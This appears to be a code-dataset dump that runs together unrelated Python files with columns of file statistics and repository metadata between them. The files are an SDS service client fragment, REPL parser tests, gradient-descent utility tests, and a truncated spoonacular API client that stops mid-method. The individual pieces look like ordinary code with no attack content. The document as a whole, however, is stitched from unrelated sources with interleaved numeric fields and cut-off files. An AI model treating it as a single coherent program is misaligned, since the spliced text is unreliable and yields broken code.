    if response.status_code < 200 or response.status_code >= 300:
        response.close()
        # Message fixed to actually include the dataview id placeholder.
        raise SdsError("Failed to get datagroups for dataview, {dataview_id}. {status}:{reason}".
                       format(dataview_id=dataview_id, status=response.status_code, reason=response.text))
    datagroups = json.loads(response.content)
    results = {}
    # dict.items() (not the Python-2-only .iteritems(), which raises
    # AttributeError on Python 3 dicts).
    for key, value in datagroups.items():
        innerobj = {}
        for key2, value2 in value.items():
            innerobj[key2] = Datagroup.fromJson(value2)
        results[key] = innerobj
    response.close()
    return results
def getDatagroup(self, namespace_id, dataview_id, datagroup_id):
    """Retrieves the datagroup identified by 'datagroup_id' from the
    specified dataview on the Sds Service.

    :raises TypeError: when any argument is None
    :raises SdsError: when the service responds outside the 2xx range
    """
    if namespace_id is None:
        raise TypeError
    # Consistency with siblings: the remaining path parameters are required too.
    if dataview_id is None:
        raise TypeError
    if datagroup_id is None:
        raise TypeError
    response = requests.get(
        self.__url + self.__getDatagroup.format(
            api_version=self.__apiVersion, tenant_id=self.__tenant,
            namespace_id=namespace_id, dataview_id=dataview_id, datagroup_id=datagroup_id),
        headers=self.__sdsHeaders())
    if response.status_code < 200 or response.status_code >= 300:
        response.close()
        # Message fixed to actually include the dataview id placeholder.
        raise SdsError("Failed to get datagroup for dataview, {dataview_id}. {status}:{reason}".
                       format(dataview_id=dataview_id, status=response.status_code, reason=response.text))
    datagroup = Datagroup.fromJson(json.loads(response.content))
    # Close on the success path too (previously leaked the connection).
    response.close()
    return datagroup
# TODO: expose the remaining preview query parameters supported by the service.
def getDataviewPreview(self, namespace_id, dataview_id, startIndex=None, endIndex=None, interval=None, form=None, count=-1, value_class=None):
    """Retrieves the interpolated preview of dataview 'dataview_id'.

    :param startIndex: optional start index for the preview window
    :param endIndex: optional end index for the preview window
    :param interval: optional interpolation interval
    :param form: optional response form
    :param count: maximum number of values (-1 means "let the service decide")
    :param value_class: optional class with a fromJson classmethod used to
        deserialize the response; raw parsed JSON is returned when None
    :raises TypeError: when namespace_id or dataview_id is None
    :raises SdsError: when the service responds outside the 2xx range
    """
    if namespace_id is None:
        raise TypeError
    if dataview_id is None:
        raise TypeError
    params = []
    # str() coercion lets callers pass non-string indexes/intervals
    # (previously "startIndex=" + startIndex raised TypeError for those).
    if startIndex is not None:
        params.append("startIndex=" + str(startIndex))
    if endIndex is not None:
        params.append("endIndex=" + str(endIndex))
    if interval is not None:
        params.append("interval=" + str(interval))
    if form is not None:
        params.append("form=" + str(form))
    if count != -1:
        params.append("count=" + str(count))
    query = "?" + "&".join(params) if params else ""
    response = requests.get(
        self.__url + self.__getDataviewPreview.format(
            api_version=self.__apiVersion, tenant_id=self.__tenant,
            namespace_id=namespace_id, dataview_id=dataview_id) + query,
        headers=self.__sdsHeaders())
    if response.status_code < 200 or response.status_code >= 300:
        response.close()
        raise SdsError("Failed to get dataview preview for dataview {dataview_id}. {status}:{reason}".
                       format(dataview_id=dataview_id, status=response.status_code, reason=response.text))
    content = json.loads(response.content)
    response.close()
    if value_class is None:
        return content
    return value_class.fromJson(content)
# private methods
def __getToken(self):
    """Return a cached AAD bearer token, refreshing it via ADAL when fewer
    than five minutes of validity remain."""
    seconds_left = self.__expiration - time.time()
    if seconds_left > 5 * 60:
        return self.__token
    auth_context = adal.AuthenticationContext(self.__authority, validate_authority=True)
    token = auth_context.acquire_token_with_client_credentials(
        self.__resource, self.__clientId, self.__clientSecret)
    if token is None:
        raise Exception("Failed to retrieve AAD Token")
    # Cache the token plus its absolute expiry time for subsequent calls.
    self.__expiration = time.time() + float(token['expiresIn'])
    self.__token = token['accessToken']
    return self.__token
def __sdsHeaders(self):
    """Build the common HTTP headers (bearer auth, JSON content type) sent
    with every SDS request."""
    headers = {
        "Authorization": "bearer %s" % self.__getToken(),
        "Content-type": "application/json",
        "Accept": "*/*; q=1",
    }
    return headers
def __validateUri(self, url):
    """Normalize 'url' to its network location plus path, dropping the
    scheme, query and fragment."""
    parts = urlparse(url)
    return "{0}{1}".format(parts.netloc, parts.path)
def __setPathAndQueryTemplates(self):
    """Initialize the str.format templates for every SDS REST path and query
    string used by this client. Called once; templates are filled in per-call
    with tenant/namespace/stream/dataview ids."""
    # Root of every route: tenant + namespace scope.
    self.__basePath = "/api/{api_version}/Tenants/{tenant_id}/Namespaces/{namespace_id}"
    # Type, behavior and stream-view CRUD + paged listing routes.
    self.__typesPath = self.__basePath + "/Types/{type_id}"
    self.__getTypesPath = self.__basePath + "/Types?skip={skip}&count={count}"
    self.__behaviorsPath = self.__basePath + "/Behaviors/{behavior_id}"
    self.__getBehaviorsPath = self.__basePath + "/Behaviors?skip={skip}&count={count}"
    self.__streamViewsPath = self.__basePath + "/StreamViews/{streamView_id}"
    self.__getStreamViewsPath = self.__basePath + "/StreamViews?skip={skip}&count={count}"
    # Stream CRUD and search.
    self.__streamsPath = self.__basePath + "/Streams/{stream_id}"
    self.__getStreamsPath = self.__basePath + "/Streams?query={query}&skip={skip}&count={count}"
    # Data read routes (value/first/last/window/range queries).
    self.__dataPath = self.__basePath + "/Streams/{stream_id}/Data"
    self.__getValueQuery = self.__dataPath + "/GetValue?index={index}&streamViewId={streamView_id}"
    self.__getFirstValue = self.__dataPath + "/GetFirstValue?streamViewId={streamView_id}"
    self.__getLastValue = self.__dataPath + "/GetLastValue?streamViewId={streamView_id}"
    self.__getWindowValues = self.__dataPath + "/GetWindowValues?startIndex={start}&endIndex={end}&streamViewId={streamView_id}"
    self.__getRangeValuesQuery = self.__dataPath + "/GetRangeValues?startIndex={start}&skip={skip}&count={count}&reversed={reverse}&boundaryType={boundary_type}&streamViewId={streamView_id}"
    # Data write routes (insert/update/replace/remove).
    self.__insertValuePath = self.__dataPath + "/InsertValue"
    self.__insertValuesPath = self.__dataPath + "/InsertValues"
    self.__updateValuePath = self.__dataPath + "/UpdateValue"
    self.__updateValuesPath = self.__dataPath + "/UpdateValues"
    self.__replaceValuePath = self.__dataPath + "/ReplaceValue"
    self.__replaceValuesPath = self.__dataPath + "/ReplaceValues"
    self.__removeValue = self.__dataPath + "/RemoveValue?index={index}"
    self.__removeWindowValues = self.__dataPath + "/RemoveWindowValues?startIndex={start}&endIndex={end}"
    # Dataview and datagroup routes.
    self.__dataviewsPath = self.__basePath + "/Dataviews"
    self.__getDataviews = self.__dataviewsPath + "?skip={skip}&count={count}"
    self.__dataviewPath = self.__dataviewsPath + "/{dataview_id}"
    self.__datagroupPath = self.__dataviewPath + "/Datagroups"
    self.__getDatagroup = self.__datagroupPath + "/{datagroup_id}"
    self.__getDatagroups = self.__datagroupPath + "?skip={skip}&count={count}"
    self.__getDataviewPreview = self.__dataviewPath + "/preview/interpolated"
| 46.238777
| 199
| 0.644964
| 5,488
| 48,412
| 5.453171
| 0.063411
| 0.064691
| 0.077589
| 0.056805
| 0.804224
| 0.773181
| 0.760517
| 0.744111
| 0.72757
| 0.724563
| 0
| 0.008889
| 0.263385
| 48,412
| 1,046
| 200
| 46.282983
| 0.830319
| 0.015616
| 0
| 0.71161
| 0
| 0.001248
| 0.088383
| 0.018191
| 0.001248
| 0
| 0
| 0
| 0
| 0
| null | null | 0
| 0.01623
| null | null | 0
| 0
| 0
| 0
| null | 0
| 0
| 0
| 1
| 1
| 1
| 1
| 1
| 1
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0
| 0
| 0
| 0
| null | 0
| 0
| 0
| 0
| 1
| 0
| 0
| 0
| 0
| 0
| 0
| 0
|
0
| 8
|
401eb27cae97f4e983d54e78fbaee0f118ab255c
| 4,539
|
py
|
Python
|
simple_repl/tests/test_parser.py
|
vaskinyy/kata-repl
|
ec27158cd8173fab4981f01624e94166d331dcbc
|
[
"MIT"
] | null | null | null |
simple_repl/tests/test_parser.py
|
vaskinyy/kata-repl
|
ec27158cd8173fab4981f01624e94166d331dcbc
|
[
"MIT"
] | null | null | null |
simple_repl/tests/test_parser.py
|
vaskinyy/kata-repl
|
ec27158cd8173fab4981f01624e94166d331dcbc
|
[
"MIT"
] | null | null | null |
import unittest
from repl import lexems
from repl.lexer import Token
from repl.parser import Parser
class Test_Parser(unittest.TestCase):
    """Unit tests for repl.parser.Parser: arithmetic parsing, operator
    precedence, brackets, (chained) assignment, and function
    definition/invocation.

    NOTE(review): several tests call run() twice on the SAME Parser instance
    (define a function, then invoke it) — presumably the parser keeps defined
    functions as instance state; confirm before restructuring.
    """

    def test_adding(self):
        # "1 + 7" -> PLUS node with DIGIT leaves.
        parser = Parser()
        tree = parser.run("1 + 7")
        self.assertEqual(tree.op, Token(lexems.PLUS, lexems.PLUS))
        self.assertEqual(tree.left.val, Token(lexems.DIGIT, 1))
        self.assertEqual(tree.right.val, Token(lexems.DIGIT, 7))

    def test_multiply(self):
        # Multiplication binds tighter, so PLUS stays at the root.
        parser = Parser()
        tree = parser.run("1 + 7 * 5")
        self.assertEqual(tree.op, Token(lexems.PLUS, lexems.PLUS))
        self.assertEqual(tree.left.val, Token(lexems.DIGIT, 1.0))

    def test_brackets(self):
        # Brackets override precedence: MULTIPLY becomes the root.
        parser = Parser()
        tree = parser.run("(1 + 7) * 5")
        self.assertEqual(tree.op, Token(lexems.MULTIPLY, lexems.MULTIPLY))
        self.assertEqual(tree.right.val, Token(lexems.DIGIT, 5.0))

    def test_assignment(self):
        parser = Parser()
        tree = parser.run("x = 3")
        self.assertEqual(tree.op, Token(lexems.ASSIGNMENT, lexems.ASSIGNMENT))
        self.assertEqual(tree.right.val, Token(lexems.DIGIT, 3.0))
        self.assertEqual(tree.left.val, Token(lexems.LETTER, 'x'))

    def test_assignment_complex(self):
        # Chained assignment is right-associative: x = (y = 3).
        parser = Parser()
        tree = parser.run("x = y = 3")
        self.assertEqual(tree.op, Token(lexems.ASSIGNMENT, lexems.ASSIGNMENT))
        self.assertEqual(tree.right.op, Token(lexems.ASSIGNMENT, lexems.ASSIGNMENT))
        self.assertEqual(tree.left.val, Token(lexems.LETTER, 'x'))

    def test_bad_fn_def(self):
        # NOTE(review): despite the "bad" name this only checks the parsed
        # function name and no error is asserted — confirm intended behavior.
        parser = Parser()
        tree = parser.run("fn avg => (x + y) / 2")
        self.assertEqual(Token(lexems.LETTER, "avg"), tree.name)

    def test_fn_def(self):
        # Function definition: name, argument list, and body root operator.
        parser = Parser()
        tree = parser.run("fn avg x y => (x + y) / 2")
        self.assertEqual(Token(lexems.LETTER, "avg"), tree.name)
        self.assertEqual([Token(lexems.LETTER, "x"), Token(lexems.LETTER, "y")], tree.arguments)
        self.assertEqual(Token(lexems.DIVIDE, lexems.DIVIDE), tree.definition.op)

    def test_fn_def_add(self):
        parser = Parser()
        tree = parser.run("fn add x y => x + z")
        self.assertEqual(Token(lexems.LETTER, "add"), tree.name)
        self.assertEqual([Token(lexems.LETTER, "x"), Token(lexems.LETTER, "y")], tree.arguments)
        self.assertEqual(Token(lexems.PLUS, lexems.PLUS), tree.definition.op)

    def test_fn_def_echo(self):
        # Single-argument identity function.
        parser = Parser()
        tree = parser.run("fn echo x => x")
        self.assertEqual(Token(lexems.LETTER, "echo"), tree.name)
        self.assertEqual([Token(lexems.LETTER, "x")], tree.arguments)
        self.assertEqual(Token(lexems.LETTER, "x"), tree.definition.val)

    def test_fn_def_call(self):
        # Define "avg", then invoke it on the same parser instance.
        parser = Parser()
        tree = parser.run("fn avg x y => (x + y) / 2")
        self.assertEqual(Token(lexems.LETTER, "avg"), tree.name)
        self.assertEqual([Token(lexems.LETTER, "x"), Token(lexems.LETTER, "y")], tree.arguments)
        self.assertEqual(Token(lexems.DIVIDE, lexems.DIVIDE), tree.definition.op)
        tree = parser.run("avg 1 2")
        self.assertEqual(Token(lexems.LETTER, "avg"), tree.name)
        self.assertEqual(Token(lexems.DIGIT, 1.0), tree.arguments[0].val)
        self.assertEqual(Token(lexems.DIGIT, 2.0), tree.arguments[1].val)

    def test_fn_def_add_call(self):
        # A call argument may itself be an expression ("x+1").
        parser = Parser()
        tree = parser.run("fn add x y => x + z")
        self.assertEqual(Token(lexems.LETTER, "add"), tree.name)
        self.assertEqual([Token(lexems.LETTER, "x"), Token(lexems.LETTER, "y")], tree.arguments)
        self.assertEqual(Token(lexems.PLUS, lexems.PLUS), tree.definition.op)
        tree = parser.run("add x+1 y")
        self.assertEqual(Token(lexems.LETTER, "add"), tree.name)
        self.assertEqual(Token(lexems.PLUS, lexems.PLUS), tree.arguments[0].op)
        self.assertEqual(Token(lexems.LETTER, "y"), tree.arguments[1].val)

    def test_fn_def_echo_call_no_def(self):
        # Invoking an undefined name ("echo1") must raise.
        parser = Parser()
        tree = parser.run("fn echo x => x")
        self.assertEqual(Token(lexems.LETTER, "echo"), tree.name)
        self.assertEqual([Token(lexems.LETTER, "x")], tree.arguments)
        self.assertEqual(Token(lexems.LETTER, "x"), tree.definition.val)
        with self.assertRaises(Exception) as context:
            tree = parser.run("echo1 11")

    def test_fn_def_echo_call_no_args(self):
        # Zero-argument function definition parses and keeps its name.
        parser = Parser()
        tree = parser.run("fn echo => 2")
        self.assertEqual(Token(lexems.LETTER, "echo"), tree.name)
| 43.228571
| 96
| 0.636043
| 606
| 4,539
| 4.70297
| 0.092409
| 0.165965
| 0.182456
| 0.237193
| 0.883158
| 0.856491
| 0.840702
| 0.8
| 0.694035
| 0.680351
| 0
| 0.010036
| 0.209738
| 4,539
| 105
| 97
| 43.228571
| 0.7845
| 0
| 0
| 0.54023
| 0
| 0
| 0.057269
| 0
| 0
| 0
| 0
| 0
| 0.45977
| 1
| 0.149425
| false
| 0
| 0.045977
| 0
| 0.206897
| 0
| 0
| 0
| 0
| null | 0
| 1
| 1
| 1
| 1
| 1
| 1
| 0
| 1
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| null | 0
| 0
| 0
| 1
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
|
0
| 8
|
40294d367a38c973cd2136fc0230c7b2b97479e3
| 12,934
|
py
|
Python
|
tests/test_utils.py
|
fossabot/touvlo
|
5eb65e11826e9519cb938a517c432701e7ce5ae9
|
[
"MIT"
] | null | null | null |
tests/test_utils.py
|
fossabot/touvlo
|
5eb65e11826e9519cb938a517c432701e7ce5ae9
|
[
"MIT"
] | null | null | null |
tests/test_utils.py
|
fossabot/touvlo
|
5eb65e11826e9519cb938a517c432701e7ce5ae9
|
[
"MIT"
] | null | null | null |
from math import radians
import pytest
from numpy import array, cos, sin, exp
from numpy.testing import assert_allclose
from touvlo.utils import (numerical_grad, g_grad, BGD, SGD, MBGD)
class TestLogisticRegression:
    """Tests for touvlo.utils: finite-difference gradients (numerical_grad),
    the sigmoid gradient (g_grad), and the batch / stochastic / mini-batch
    gradient-descent optimizers (BGD / SGD / MBGD).

    NOTE(review): the class name says "LogisticRegression" but every test
    targets generic utilities — confirm whether it should be renamed.
    """

    @pytest.fixture(scope="module")
    def err(self):
        # Finite-difference step passed to numerical_grad.
        return 0.0001

    def test_numeric_grad_1(self, err):
        # J(x) = sum(3*x^2)  =>  dJ/dx = 6x.
        def J(x):
            return sum(3 * (x ** 2))
        theta = array([[0], [4], [10]])
        assert_allclose(array([[0], [24], [60]]),
                        numerical_grad(J, theta, err),
                        rtol=0, atol=0.001, equal_nan=False)

    def test_numeric_grad_2(self, err):
        # J(x) = sum(1/x)  =>  dJ/dx = -1/x^2.
        def J(x):
            return sum(1 / x)
        theta = array([[5], [8], [20]])
        assert_allclose(array([[-0.04], [-0.015625], [-0.0025]]),
                        numerical_grad(J, theta, err),
                        rtol=0, atol=0.001, equal_nan=False)

    def test_numeric_grad_3(self, err):
        # J(x) = sum(cos(x))  =>  dJ/dx = -sin(x).
        def J(x):
            return sum(cos(x))
        theta = array([[radians(30)],
                       [radians(45)],
                       [radians(60)],
                       [radians(90)]])
        assert_allclose(array([[-sin(radians(30))],
                               [-sin(radians(45))],
                               [-sin(radians(60))],
                               [-sin(radians(90))]]),
                        numerical_grad(J, theta, err),
                        rtol=0, atol=0.001, equal_nan=False)

    def test_numeric_grad_4(self, err):
        # J(x) = sum(exp(x))  =>  dJ/dx = exp(x).
        def J(x):
            return sum(exp(x))
        theta = array([[-10], [-1], [0], [1], [10]])
        assert_allclose(array([[exp(-10)],
                               [exp(-1)],
                               [exp(0)],
                               [exp(1)],
                               [exp(10)]]),
                        numerical_grad(J, theta, err),
                        rtol=0, atol=0.001, equal_nan=False)

    def test_numeric_grad_5(self, err):
        # J(x) = sum(7*x)  =>  dJ/dx = 7 (constant gradient).
        def J(x):
            return sum(7 * x)
        theta = array([[-10], [-1], [0], [1], [10]])
        assert_allclose(array([[7],
                               [7],
                               [7],
                               [7],
                               [7]]),
                        numerical_grad(J, theta, err),
                        rtol=0, atol=0.001, equal_nan=False)

    def test_sigmoid_gradient(self):
        # g'(z) = g(z)(1 - g(z)); peaks at 0.25 when z = 0.
        z = array([-1, -0.5, 0, 0.5, 1])
        assert_allclose(g_grad(z),
                        [0.196612, 0.235004, 0.25, 0.235004, 0.196612],
                        rtol=0, atol=0.001, equal_nan=False)

    def test_BGD1(self, err):
        # Linear-regression gradient; large alpha makes BGD diverge,
        # producing the large expected coefficients.
        def grad(X, y, theta):
            m = len(y)
            grad = (1 / m) * (X.T).dot(X.dot(theta) - y)
            return grad
        X = array([[0, 1, 2], [-1, 5, 3], [2, 0, 1]])
        initial_theta = array([[0], [0], [0]])
        y = array([[0.3], [1.2], [0.5]])
        num_iters = 3
        alpha = 1
        assert_allclose(array([[-46.415], [276.248], [192.204]]),
                        BGD(X, y, grad, initial_theta,
                            alpha, num_iters),
                        rtol=0, atol=0.001, equal_nan=False)

    def test_BGD2(self, err):
        # Small alpha: a few BGD steps from a non-zero start.
        def grad(X, y, theta):
            m = len(y)
            grad = (1 / m) * (X.T).dot(X.dot(theta) - y)
            return grad
        X = array([[0, 1, 2], [-1, 5, 3], [2, 0, 1]])
        initial_theta = array([[0.3], [2.7], [1.6]])
        y = array([[0.3], [1.2], [0.5]])
        num_iters = 4
        alpha = 0.001
        assert_allclose(array([[0.31748], [2.58283], [1.51720]]),
                        BGD(X, y, grad, initial_theta,
                            alpha, num_iters),
                        rtol=0, atol=0.001, equal_nan=False)

    def test_BGD3(self, err):
        # Extra named parameters must be forwarded to grad via kwargs.
        def grad(X, y, theta, schleem, plumbus, wubba, lubba):
            m = len(y)
            grad = (schleem / (m * wubba))
            grad = grad * (X.T).dot(X.dot(theta) - y)
            grad = grad + plumbus / (2 * lubba)
            return grad
        X = array([[0, 1, 2], [-1, 5, 3], [2, 0, 1]])
        initial_theta = array([[0], [0], [0]])
        y = array([[0.3], [1.2], [0.5]])
        num_iters = 5
        plumbus = 0.8
        schleem = 0.6
        wubba = 3.4
        lubba = 2.7
        alpha = 0.01
        assert_allclose(array([[-0.0078777], [0.0106179], [0.0060865]]),
                        BGD(X, y, grad, initial_theta,
                            alpha, num_iters, lubba=lubba,
                            schleem=schleem, wubba=wubba,
                            plumbus=plumbus),
                        rtol=0, atol=0.001, equal_nan=False)

    def test_SGD1(self, err):
        def grad(X, y, theta):
            m = len(y)
            grad = (1 / m) * (X.T).dot(X.dot(theta) - y)
            return grad
        X = array([[0, 1, 2], [-1, 5, 3], [2, 0, 1]])
        initial_theta = array([[0], [0], [0]])
        y = array([[0.3], [1.2], [0.5]])
        num_iters = 1
        alpha = 1
        assert_allclose(array([[6.1000], [-10.2000], [-3.7000]]),
                        SGD(X, y, grad, initial_theta,
                            alpha, num_iters),
                        rtol=0, atol=0.001, equal_nan=False)

    def test_SGD2(self, err):
        def grad(X, y, theta):
            m = len(y)
            grad = (1 / m) * (X.T).dot(X.dot(theta) - y)
            return grad
        X = array([[0, 1, 2], [-1, 5, 3], [2, 0, 1]])
        initial_theta = array([[0], [0], [0]])
        y = array([[0.3], [1.2], [0.5]])
        num_iters = 10
        alpha = 0.01
        assert_allclose(array([[0.042237], [0.162748], [0.133705]]),
                        SGD(X, y, grad, initial_theta,
                            alpha, num_iters),
                        rtol=0, atol=0.001, equal_nan=False)

    def test_SGD3(self, err):
        def grad(X, y, theta):
            m = len(y)
            grad = (1 / m) * (X.T).dot(X.dot(theta) - y)
            return grad
        X = array([[0, 1, 2], [-1, 5, 3], [2, 0, 1]])
        initial_theta = array([[0.3], [2.7], [1.6]])
        y = array([[0.3], [1.2], [0.5]])
        num_iters = 5
        alpha = 0.001
        assert_allclose(array([[0.36143], [2.28673], [1.30772]]),
                        SGD(X, y, grad, initial_theta,
                            alpha, num_iters),
                        rtol=0, atol=0.001, equal_nan=False)

    def test_SGD4(self, err):
        # SGD also forwards extra named parameters to grad.
        def grad(X, y, theta, schleem, plumbus, wubba, lubba):
            m = len(y)
            grad = (schleem / (m * wubba))
            grad = grad * (X.T).dot(X.dot(theta) - y)
            grad = grad + plumbus / (2 * lubba)
            return grad
        X = array([[0, 1, 2], [-1, 5, 3], [2, 0, 1]])
        initial_theta = array([[0.3], [2.7], [1.6]])
        y = array([[0.3], [1.2], [0.5]])
        num_iters = 8
        plumbus = 1.2
        schleem = 0.9
        wubba = 2.4
        lubba = 3
        alpha = 0.005
        assert_allclose(array([[0.42789], [1.63920], [0.84140]]),
                        SGD(X, y, grad, initial_theta,
                            alpha, num_iters, lubba=lubba,
                            schleem=schleem, wubba=wubba,
                            plumbus=plumbus),
                        rtol=0, atol=0.001, equal_nan=False)

    def test_MBGD1(self, err):
        # Mini-batch descent: b is the batch size.
        def grad(X, y, theta):
            m = len(y)
            grad = (1 / m) * (X.T).dot(X.dot(theta) - y)
            return grad
        X = array([[0, 1, 2], [-1, 5, 3.6], [2, 0.5, 1],
                   [2, -1, 4], [3, 6, -3], [0, 7.8, 3.5],
                   [2.5, 3, 4.3], [3.2, 5.7, -3], [0, 7.8, 3.5], [9, 8, 7]])
        initial_theta = array([[0], [0], [0]])
        y = array([[0.3], [1.2], [0.5], [0.8], [1.5],
                   [-0.75], [0.43], [0.62], [0.85], [-0.3]])
        num_iters = 1
        alpha = 0.1
        b = 3
        assert_allclose(array([[-18.314], [-15.212], [-14.151]]),
                        MBGD(X, y, grad, initial_theta,
                             alpha, num_iters, b),
                        rtol=0, atol=0.001, equal_nan=False)

    def test_MBGD2(self, err):
        def grad(X, y, theta):
            m = len(y)
            grad = (1 / m) * (X.T).dot(X.dot(theta) - y)
            return grad
        X = array([[0, 1, 2], [-1, 5, 3.6], [2, 0.5, 1],
                   [2, -1, 4], [3, 6, -3], [0, 7.8, 3.5],
                   [2.5, 3, 4.3], [3.2, 5.7, -3], [0, 7.8, 3.5], [9, 8, 7]])
        initial_theta = array([[3], [-2], [0.7]])
        y = array([[0.3], [1.2], [0.5], [0.8], [1.5],
                   [-0.75], [0.43], [0.62], [0.85], [-0.3]])
        num_iters = 1
        alpha = 0.05
        b = 3
        assert_allclose(array([[-2.9970], [-5.3434], [-3.5491]]),
                        MBGD(X, y, grad, initial_theta,
                             alpha, num_iters, b),
                        rtol=0, atol=0.001, equal_nan=False)

    def test_MBGD3(self, err):
        # Batch size (4) that does not divide the sample count (10).
        def grad(X, y, theta):
            m = len(y)
            grad = (1 / m) * (X.T).dot(X.dot(theta) - y)
            return grad
        X = array([[0, 1, 2], [-1, 5, 3.6], [2, 0.5, 1],
                   [2, -1, 4], [3, 6, -3], [0, 7.8, 3.5],
                   [2.5, 3, 4.3], [3.2, 5.7, -3], [0, 7.8, 3.5], [9, 8, 7]])
        initial_theta = array([[3], [-2], [0.7]])
        y = array([[0.3], [1.2], [0.5], [0.8], [1.5],
                   [-0.75], [0.43], [0.62], [0.85], [-0.3]])
        num_iters = 3
        alpha = 0.05
        b = 4
        assert_allclose(array([[-4.6898], [-4.1763], [-6.0834]]),
                        MBGD(X, y, grad, initial_theta,
                             alpha, num_iters, b),
                        rtol=0, atol=0.001, equal_nan=False)

    def test_MBGD4(self, err):
        def grad(X, y, theta):
            m = len(y)
            grad = (1 / m) * (X.T).dot(X.dot(theta) - y)
            return grad
        X = array([[0, 1, 2], [-1, 5, 3.6], [2, 0.5, 1],
                   [2, -1, 4], [3, 6, -3], [0, 7.8, 3.5],
                   [2.5, 3, 4.3], [3.2, 5.7, -3], [0, 7.8, 3.5], [9, 8, 7]])
        initial_theta = array([[3], [-2], [0.7]])
        y = array([[0.3], [1.2], [0.5], [0.8], [1.5],
                   [-0.75], [0.43], [0.62], [0.85], [-0.3]])
        num_iters = 1
        alpha = 0.05
        b = 5
        assert_allclose(array([[0.67576], [-2.01056], [-0.80705]]),
                        MBGD(X, y, grad, initial_theta,
                             alpha, num_iters, b),
                        rtol=0, atol=0.001, equal_nan=False)

    def test_MBGD5(self, err):
        # MBGD also forwards extra named parameters to grad.
        def grad(X, y, theta, schleem, plumbus, wubba, lubba):
            m = len(y)
            grad = (schleem / (m * wubba))
            grad = grad * (X.T).dot(X.dot(theta) - y)
            grad = grad + plumbus / (2 * lubba)
            return grad
        X = array([[0, 1, 2], [-1, 5, 3.6], [2, 0.5, 1],
                   [2, -1, 4], [3, 6, -3], [0, 7.8, 3.5],
                   [2.5, 3, 4.3], [3.2, 5.7, -3], [0, 7.8, 3.5], [9, 8, 7]])
        initial_theta = array([[3], [-2], [0.7]])
        y = array([[0.3], [1.2], [0.5], [0.8], [1.5],
                   [-0.75], [0.43], [0.62], [0.85], [-0.3]])
        num_iters = 1
        plumbus = 1.2
        schleem = 0.9
        wubba = 2.4
        lubba = 3
        alpha = 0.05
        b = 5
        assert_allclose(array([[2.27894], [-1.54560], [0.30656]]),
                        MBGD(X, y, grad, initial_theta,
                             alpha, num_iters, b, lubba=lubba,
                             schleem=schleem, wubba=wubba,
                             plumbus=plumbus),
                        rtol=0, atol=0.001, equal_nan=False)

    def test_MBGD6(self, err):
        def grad(X, y, theta, schleem, plumbus, wubba, lubba):
            m = len(y)
            grad = (schleem / (m * wubba))
            grad = grad * (X.T).dot(X.dot(theta) - y)
            grad = grad + plumbus / (2 * lubba)
            return grad
        X = array([[0, 1, 2], [-1, 5, 3.6], [2, 0.5, 1],
                   [2, -1, 4], [3, 6, -3], [0, 7.8, 3.5],
                   [2.5, 3, 4.3], [3.2, 5.7, -3], [0, 7.8, 3.5], [9, 8, 7]])
        initial_theta = array([[3], [-2], [0.7]])
        y = array([[0.3], [1.2], [0.5], [0.8], [1.5],
                   [-0.75], [0.43], [0.62], [0.85], [-0.3]])
        num_iters = 5
        plumbus = 1.2
        schleem = 0.9
        wubba = 2.4
        lubba = 3
        alpha = 0.1
        b = 5
        assert_allclose(array([[-0.0062510], [-0.3414393], [-0.3127686]]),
                        MBGD(X, y, grad, initial_theta,
                             alpha, num_iters, b, lubba=lubba,
                             schleem=schleem, wubba=wubba,
                             plumbus=plumbus),
                        rtol=0, atol=0.001, equal_nan=False)
| 35.729282
| 76
| 0.394773
| 1,791
| 12,934
| 2.778894
| 0.082635
| 0.053044
| 0.034358
| 0.038176
| 0.811935
| 0.791642
| 0.78702
| 0.743018
| 0.734378
| 0.733173
| 0
| 0.146139
| 0.414334
| 12,934
| 361
| 77
| 35.828255
| 0.510891
| 0
| 0
| 0.744186
| 0
| 0
| 0.000464
| 0
| 0
| 0
| 0
| 0
| 0.066445
| 1
| 0.126246
| false
| 0
| 0.016611
| 0.019934
| 0.209302
| 0
| 0
| 0
| 0
| null | 0
| 0
| 0
| 1
| 1
| 1
| 1
| 1
| 1
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0
| 0
| 0
| 0
| null | 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
|
0
| 7
|
4029bb53471c97a4e61ffb5bcb20e1ae2fbe1e9a
| 446,837
|
py
|
Python
|
python/spoonacular/com/spoonacular/default_api.py
|
FPU-Spring-2021-CEN4010/spoonacular-api-clients
|
5becc86987c1b0406ed05d02f5c158fba284aa9c
|
[
"MIT"
] | null | null | null |
python/spoonacular/com/spoonacular/default_api.py
|
FPU-Spring-2021-CEN4010/spoonacular-api-clients
|
5becc86987c1b0406ed05d02f5c158fba284aa9c
|
[
"MIT"
] | null | null | null |
python/spoonacular/com/spoonacular/default_api.py
|
FPU-Spring-2021-CEN4010/spoonacular-api-clients
|
5becc86987c1b0406ed05d02f5c158fba284aa9c
|
[
"MIT"
] | null | null | null |
# coding: utf-8
"""
spoonacular API
The spoonacular Nutrition, Recipe, and Food API allows you to access over 380,000 recipes, thousands of ingredients, 80,000 food products, and 100,000 menu items. Our food ontology and semantic recipe search engine makes it possible to search for recipes using natural language queries, such as \"gluten free brownies without sugar\" or \"low fat vegan cupcakes.\" You can automatically calculate the nutritional information for any recipe, analyze recipe costs, visualize ingredient lists, find recipes for what's in your fridge, find recipes based on special diets, nutritional requirements, or favorite ingredients, classify recipes into types and cuisines, convert ingredient amounts, or even compute an entire meal plan. With our powerful API, you can create many kinds of food and especially nutrition apps. Special diets/dietary requirements currently available include: vegan, vegetarian, pescetarian, gluten free, grain free, dairy free, high protein, whole 30, low sodium, low carb, Paleo, ketogenic, FODMAP, and Primal. # noqa: E501
The version of the OpenAPI document: 1.0
Contact: david@spoonacular.com
Generated by: https://openapi-generator.tech
"""
from __future__ import absolute_import
import re # noqa: F401
# python 2 and python 3 compatibility library
import six
from spoonacular.api_client import ApiClient
from spoonacular.exceptions import (
ApiTypeError,
ApiValueError
)
class DefaultApi(object):
"""NOTE: This class is auto generated by OpenAPI Generator
Ref: https://openapi-generator.tech
Do not edit the class manually.
"""
def __init__(self, api_client=None):
    """Create the API facade; a default ApiClient is built when none is supplied."""
    self.api_client = api_client if api_client is not None else ApiClient()
def add_to_meal_plan(self, username, hash, inline_object11, **kwargs):  # noqa: E501
    """Add to Meal Plan  # noqa: E501

